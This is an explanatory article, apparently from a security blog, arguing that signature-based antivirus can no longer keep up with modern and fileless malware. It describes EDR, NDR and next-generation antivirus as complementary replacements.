Traditional Antivirus software seems to have reached end of the road. Put differently, it (antivirus) cannot protect the systems it is installed upon sufficiently. This might be deemed a controversial statement by some and denied in its entirety by others but the march of progress just within the cyber security industry strongly suggests that this statement is true.
Before this article attempts to put any argument to bed once and for all and indeed shows that traditional antivirus products are no longer fit for purpose it is important to define what a traditional antivirus product is. By traditional it is meant any antivirus product that relies on signature-based detection to prevent malware infections.
The Signature Problem
Over the years it has become apparent that the signature-based approach suffers from some inherent issues. The first of which can be seen as the case of sacrificial lambs, as a machine needs to be infected with a malware strain before it can be reversed engineered and a signature developed so that other users cans be protected.
The newly developed signature is then pushed out to endpoints so that they can be protected from that malware strain. For the end user this means that when they perform a malware scan, the software can detect possible instances of that malware and all others that have a signature in place. This does take time and requires significant use of human experts to reverse engineer a sample of malware, both of which work to the attacker’s advantage. Further, simply repackaging the malware, changing its code, or changing its delivery method can render a previous signature obsolete and incapable of detecting the newer version of the malware, so the cycle of sacrificial lamb, reverse engineering, signature development, and pushing the signature to endpoints begins again.
These shortfalls have been further exacerbated by initial access brokers and the Ransomware-as-a-Service model. As one group of security researchers put it,
“Add to that the increase in Initial Access Brokers selling backdoors to compromised organizations, the RaaS (Ransomware-as-a-Service) operations that allow even the technically challenged to set up and execute a ransomware attack campaign, and all the other players in the ransomware economy who are pushing the ransom demands into the tens-of-millions of dollars, and we have a problem for which more advanced solutions are required.”
The Malware Arms Race
The sacrificial lamb methodology employed above along with the time needed, and human resources needed, to develop a signature simply cannot keep up with the influx of not only new malware strains but the rate at which malware is updated and sent into the wild. Some 10 years ago, traditional antivirus packages did a great job at defending against the vast majority of malware seen in the wild.
This is due in part to malware at that time being developed by “adolescent cyber vandals”, whose aim was to show off their coding skills and feed curiosity. Now those adolescents are adults with a set of skills that can make them a ton of cash, illicitly earned but still. Their coding skills are up tenfold and with recent trends in software development, namely, to make development faster from planning to deployment, a true malware arms race is happening. Further, some of those cyber vandals now head up major state-sponsored groups, which are well-funded and protected by their relative state departments. The firm that called these individuals adolescent cyber vandals further went on to say,
“More than 75% of malicious programs – i.e. the overwhelming majority – are created by the criminal computer underground, with the aim of infecting a defined number of computers on the Internet. The number of new viruses and Trojans is now increasing every day by a few hundred – the Kaspersky Virus Lab receives between 200 and 300 new samples a day.”
This argument is not even considering what both machine learning and AI bring to the table in terms of vastly speeding up development times. If traditional antivirus solutions cannot keep up today with their methodology, namely if a new remote access trojan is discovered as an example, the current time frame of developing a signature, pushing updates to customers, then repeating for variants of the trojan, what chance do they have against tomorrows threat developed in record time. We have all seen the articles of software developers leveraging ChatGPT to make their jobs easier; it would be naive to think threat actors are not doing the same.
The Scourge of Fileless Malware
The advent of fileless malware, a broad category of malware that share the common trait of not writing the malware components to the hard disk of the infected machine, highlights why traditional antivirus packages are not fit for purpose. Fileless malware relies on abusing legitimate applications to execute malware scripts. To do this the malware is often run from memory and executed via PowerShell or other legitimate applications and to remain persistent files associated with the malware are instructed to execute when the machine boots up.
As no malware is written to disk, it cannot be detected by virus scans initiated by the antivirus software automatically or the end user manually. Further, antivirus software will whitelist trusted applications, meaning that any activity initiated by those applications, even if abused for malicious reasons, will not flag any suspicion by the software. This reality is further complicated by the fact that malware developers who are going fileless will tie the execution of malware to critical operations of the operating system. These are often areas where the antivirus application has no visibility whatsoever.
Modern Solutions to the Problem
These limitations have been known for some time, and security firms have developed two technologies that correct the failure of now-outdated products. Those being Endpoint Detection and Response (EDR), Network Detection and Response (NDR), and Next-Generation Antivirus (NGAV).
EDR – Endpoint Detection & Response
The term was initially coined by Gartner to mean a security solution that,
“…records and stores endpoint-system-level behaviors, uses various data analytics techniques to detect suspicious system behavior, provides contextual information, blocks malicious activity, and provides remediation suggestions to restore affected systems.”
EDR operates on the principle that all systems and workloads within an endpoint and the greater network need to be accessible to the security software and human security professionals to truly protect a system. To this extent, EDRs need to be thoroughly holistic and offer the following features to make a difference when compared to antivirus software from a few years ago. Those features are incident data search and investigation alert triage, suspicious activity validation, threat hunting, and malicious activity detection and containment.
However, EDR primarily focuses on detecting and responding to threats at the endpoint level and lacks the ability to monitor and analyze network-level traffic and detect threats that may go unnoticed at the endpoint. This is where NDR comes in.
NDR – Network Detection & Response
NDR solutions are designed to monitor, analyse, and detect threats at the network level. By inspecting network traffic, NDR tools can identify anomalies, suspicious patterns, and indicators of compromise (IOCs) that may indicate a potential cyber attack. NDR provides organisations with a holistic view of their network, helping them identify threats that may have bypassed traditional security measures and gained a foothold in the network infrastructure. As a practical example, the technology allows for the detection of lateral movement, the type favored by threat actors when compromising enterprise networks.
NGAV – Next Gen Anti-Virus
A Next-Generation Antivirus can be seen as going beyond known file-based malware signatures and heuristics. To do so they are system-centric and follow a cloud-based approach. It uses predictive analytics driven by machine learning and artificial intelligence. This is combined with threat intelligence to provide the following improved security features:
- Detect and prevent malware and fileless non-malware attacks
- Identify malicious behavior and TTPs from unknown sources
- Collect and analyze comprehensive endpoint data to determine root causes
- Respond to new and emerging threats that previously go undetected.
All these technological advancements should not be viewed in isolation. EDR, NDR, and NGAV complement one another and this should be used together. As a practical example, EDR can help discover even the minutest changes in files, registries, and networks that help security teams uncover malicious activity hidden in plain sight, greatly improving threat intelligence-gathering capabilities across vast sectors of the economy. This threat intelligence can then be swiftly passed onto NGAV solutions to prevent malicious attacks that would have initially passed by an NGAV solution as there was no previous actionable intelligence that the AI and machine learning algorithms could use. This is done all while NDR monitors the broader network the endpoint forms a part of.